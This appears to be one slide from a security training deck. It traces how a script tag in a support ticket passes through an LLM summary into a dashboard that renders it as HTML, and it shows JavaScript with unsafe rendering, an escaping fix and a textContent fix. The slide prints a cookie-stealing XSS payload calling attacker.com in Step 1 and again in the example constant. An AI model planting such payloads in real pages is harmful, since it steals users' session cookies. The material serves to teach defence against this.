Part 1 · What Is It? · Slide 2 of 27 · What Just Happened
The LLM was a middleman. The browser was the target.
Let’s trace the exact failure.
Step 1 — Attacker Input

The attacker’s ticket contained: <script>fetch('https://attacker.com?c='+document.cookie)</script>

Just text. The LLM received it as part of the ticket context.

Step 2 — LLM Output

The LLM tried to summarize the ticket. It echoed the user’s text back in its response — including the script tag. From the model’s perspective, it was just summarizing. It had no idea the text was code.

Step 3 — Application Error

The dashboard application took the LLM’s response and inserted it into the page with innerHTML or a server-side template that didn’t HTML-encode the string. The browser parsed the response as HTML. It found a script tag. It ran it.

The Actual Bug

The application never asked: "Is this output safe to render as HTML?" It treated LLM output as trusted content, and that was the mistake. The LLM didn't cause the XSS; the missing output encoding did. Any string that reaches the page, whether it came from a user, a database, or a model, is untrusted data until it has been encoded for the context it is rendered in.
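The rendering step from Step 3, written both ways, as an added example (this is not code from the slides or from the dashboard they describe). The `LLM_SUMMARY` string is a constructed stand-in for a model response that echoed the attacker's ticket text; the function names are hypothetical.

```javascript
// Constructed stand-in for the model's summary: it repeats the ticket body
// verbatim, exactly as Step 2 describes.
const LLM_SUMMARY =
  "Customer reports login issue. Ticket body: " +
  "<script>fetch('https://attacker.com?c='+document.cookie)</script>";

// Vulnerable: model output is concatenated straight into markup.
// The browser parses the summary as HTML, finds the <script>, and runs it.
function renderSummaryUnsafe(summary) {
  return `<div class="summary">${summary}</div>`;
}

// Encode the five characters that let text break out of an HTML text node
// or a quoted attribute value. This is output encoding for an HTML text
// context; other contexts (URLs, JavaScript strings, CSS) need their own
// encoders, so pick the encoder by where the string lands.
function escapeHtml(text) {
  return String(text).replace(/[&<>"']/g, (ch) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[ch]);
}

// Hardened: the same template, but the untrusted string is encoded first.
// The browser displays the literal text "<script>..." and executes nothing.
function renderSummarySafe(summary) {
  return `<div class="summary">${escapeHtml(summary)}</div>`;
}

// Cheap regression check for a test suite: does rendered markup contain a
// real script element? A heuristic, not an HTML parser, but it catches the
// exact failure on this slide and flags the unsafe renderer.
function containsScriptElement(html) {
  return /<script\b[^>]*>/i.test(html);
}

// Client-side equivalent of the fix: assign to textContent, never innerHTML.
// No encoder is needed because the browser does not parse the string at all.
function assignSummary(element, summary) {
  element.textContent = summary; // never: element.innerHTML = summary
}
```

The two renderers differ by a single call, which is the whole point: the template, the model and the attacker's text are identical in both cases, and only the encoding step decides whether the browser sees data or code.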
